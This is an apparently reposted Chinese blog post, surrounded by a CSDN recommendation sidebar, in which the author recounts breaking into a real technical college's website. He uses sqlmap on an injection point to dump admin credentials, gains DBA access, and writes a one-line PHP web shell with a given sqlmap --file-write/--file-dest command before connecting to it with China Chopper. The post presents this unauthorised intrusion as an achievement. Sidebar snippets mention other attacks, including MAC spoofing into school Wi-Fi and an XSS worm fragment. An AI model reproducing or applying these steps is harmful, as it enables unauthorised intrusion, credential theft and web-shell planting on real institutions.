实战一个职业技术学校。 by:hack某某

最新推荐文章于 2024-06-25 10:51:37 发布
最新推荐文章于 2024-06-25 10:51:37 发布
阅读量100 收藏
点赞数
原文链接:http://www.cnblogs.com/hack-moumou/p/5903876.html
版权

11

这是我们的目标,某一技术学院,这是一个注入点

上sqlmap

22

33

跑出了管理账号密码

扫后台

44

没有找到,注入就相当鸡肋了

换换其他思路

66

dba权限,想到了直接写入

找找路径之类的

55

找到了,运气相当的好

直接利用sqlmap写入一句话

语句*sqlmap,py -u “url” –file-write=”要写入本地文件路径”(注意为/) –file-dest=”网站路径/1.php”(注意为/)

访问空白,成功了,菜刀连接

99

shell到手。。。

我还是那个帅气的某某

QQ2553083572

转载于:https://www.cnblogs.com/hack-moumou/p/5903876.html

dengying7948
关注
HackBGRT(一):修改window系统启动logo动画
You瞧谁不起 - 道不尽世间的沧桑,诉不完人生的悲凉
02-22 2万+
修改window系统启动logo动画
拥有:Hack汇编器
02-15
HACK Application Suite是一个库和程序,用于处理与HACK CPU和指令集以及JACK编程语言有关的各种任务。 HAS当前包含以下内容: HACK汇编器 HACK反汇编器 HACK解释器 HACK CPU仿真器 JACK虚拟机 JACK编译器 ...
ajax hack,一个有趣的Ajax Hack示范 -电脑资料
weixin_35711852的博客
08-05 4295
今天在梦之光芒的BLOG上看见了一个Ajax Hack示范,其实跨站发现很容易,但是要做到大危害还是很难,偷偷COOKIE什么的只针对用户而已,XSS WORM的那种利用才是可怕的,来看看他的一段VBSCRIPT脚本vbscript.:execute("dim l,s:l=chr(13)+chr(10):s=""sub mycode""&l:s=s&""dim http,url,p...
GitHack一个git泄露利用脚本
iastro的专栏
01-10 4966
GitHack一个git泄露利用脚本 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。 作者:exploit.py来源:FreeBuf|2015-04-30 08:03  收藏   分享 免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学
Hack The Box——Tabby
热门推荐
江左盟的博客
07-14 1万+
简介 信息收集 使用nmap快速扫描端口,如图: 查看80端口web服务,如图: 发现一个地址,添加到hosts文件, 漏洞发现 尝试读取/etc/passwd 尝试使用相对路径 /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3..
Hackthebox靶场---Undetected 攻略实战(难)
weixin_51339377的博客
04-24 4319
正常思路 nmap进行端口扫描 发现开放了80和22端口 网站进入80端口 是一个珠宝网站 发现点击store会重定向到其他的url http://store.djewelry.htb/ 我们首先用dirsearch扫描一下 然而并没有发现什么有用的,也跟基本主界面测试差不多 除了store可能有可以利用的地方 我们不妨把这个未知url的地址也dns解析到这个ip地址 执行以下命令即可 echo 10.10.11.146 djewelry.htb store.dj...
CTF实战:从入门到提升
chen520的博客
06-25 6781
本书采用理论与案例相结合的形式,全面讲解传统网络安全竞赛CTF解题赛中五大类重点知识和技能。全书共17章,其中第1~3章为第1篇Web安全,从原理层面讲解了最常见的PHP相关安全问题,以及文件上传漏洞、文件包含漏洞、命令执行漏洞、SQL注入漏洞、SSRF漏洞等常见Web漏洞的原理与利用;第4~6章为第2篇Crypto密码,主要介绍了密码学基础、常见编码、古典密码学和现代密码学等相关内容;第7~10章为第3篇MISC安全,主要介绍了隐写术、压缩包分析、流量分析和取证分析等相关内容;
HackTheBox::Seal
aya3t的博客
10-24 5389
HackTheBox::Seal
前端必知:33.css的hack
qq_52799985的博客
07-29 7429
在前端开发中,CSS hack是一种常用的技巧,用于解决不同浏览器之间对CSS属性、选择器或特性支持的差异。通过使用CSS hack,可以针对特定的浏览器或浏览器版本提供特定的样式规则,以确保在不同浏览器中获得一致的显示效果。
用html制作一个华为页面,Web前端项目实战——华为荣耀商城(学完html+css就可以做)...
weixin_33902056的博客
06-03 2658
复习:1.1到目前所学的布局方式table布局:div+css布局:固定布局百分比布局1.2 盒子模型Margin border padding content1.3 布局模型流动模型 标准流 block inline inline-block浮动模型 left right层模型 relative absolute fixed1.4 BFC(Block Formating C...
实战:伪造MAC/IP地址入侵学校无线网
zhaoyuhan1124的博客
08-20 1万+
简介 本文简要阐述如何通过脚本进行MAC spoofing连上学校无线网,并针对其中设备进行嗅探/情报收集 原理 并非每个设备都支持WPA2验证,在很多公共设施(酒店,机场,学校)都会提供使用captive portal的无线网: 用户连上后被导入验证页面,然后输入帐号密码上网。这种验证方式并非天衣无缝,相反,有很多种方法可以绕过,甚至能危害这些公共网络中设备的安全性,造成安全隐患。 步骤 DEF...
HACK_Arrays:HACK Academy 的 JS 练习
07-14
给定一个数组,该函数应该返回一个数组,该数组在位置 0 将包含数组的第一个元素,在位置 1 它将包含删除第一个元素的原始数组。 hack_push (element, array):该函数将接收 2 个参数(元素和数组)。 给定一个...
HackNews:一个非常简单的 Hack News android 应用程序。 一个 RESTful 客户端
06-07
"HackNews:一个非常简单的 Hack News android 应用程序。 一个 RESTful 客户端" 指的是一个专为Android平台设计的应用程序,它旨在提供对Hack News网站内容的访问。Hack News是一个热门的科技新闻分享社区,用户可以...
HACK36_2021:HACK36项目资料库
04-11
它具有Allert按钮,如果用户单击它,则更接近第一个用户的用户将收到推送通知。 提示按钮也可能会通知最近的警察部门。 当然,为了防止虚假通知,人们会收到警告 执行: 从广义上讲,我们的应用程序需要高级...
平台的核心功能包括: 虚拟靶场: Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到
06-22
Hack The Box 拥有一个活跃的社区,成员们可以在论坛、聊天室或通过平台的其他社交功能进行交流。 社区成员可以组建团队,参加团队竞赛,共同解决难题。 教育和企业服务: 对于教育机构,Hack The Box 提供了教育...
笔记本盖子状态检测GPD Pocket 3自动禁用触摸屏
10-20
GPD Pocket 3如果把合盖动作改成无操作之后,合盖后触摸屏不会自动禁用,然后各种自动乱点,开盖发现打开了一堆乱七八糟的东西,故写了个软件来后台监测盖子的开合状态,并自动启用或禁用触摸屏驱动,以防在合盖后误触。
基于Java和C语言的2023年Arduino重拾项目设计源码
最新发布
10-21
该Arduino重拾项目设计源码基于Java和C语言编写,共包含62个文件,其中Java源文件32个,C头文件12个,Arduino代码文件9个,以及CSV、LICENSE、Markdown、XML等其他类型文件。项目旨在2023年重新探索Arduino编程,适合初学者和中级爱好者。
OCR识别-支持识别80+种语言的算法项目-包括Latin-Chinese-Arabic等等-附详细完整流程教程.zip
10-20
OCR识别_支持识别80+种语言的算法项目_包括Latin_Chinese_Arabic等等_附详细完整流程教程
MyBatis 27道面试题和答案(2025最新版).docx
10-20
MyBatis 27道面试题和答案(2025最新版)
CSS Hack技巧:兼容性总结与实战演示
"CSS Hack是Web开发过程中解决跨浏览器兼容性问题的一种技术手段,特别是在处理那些在不同版本的Internet Explorer(IE)及其他浏览器中存在差异的CSS样式时尤为关键。本文档的标题《css hack日志》着重于总结和分享...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值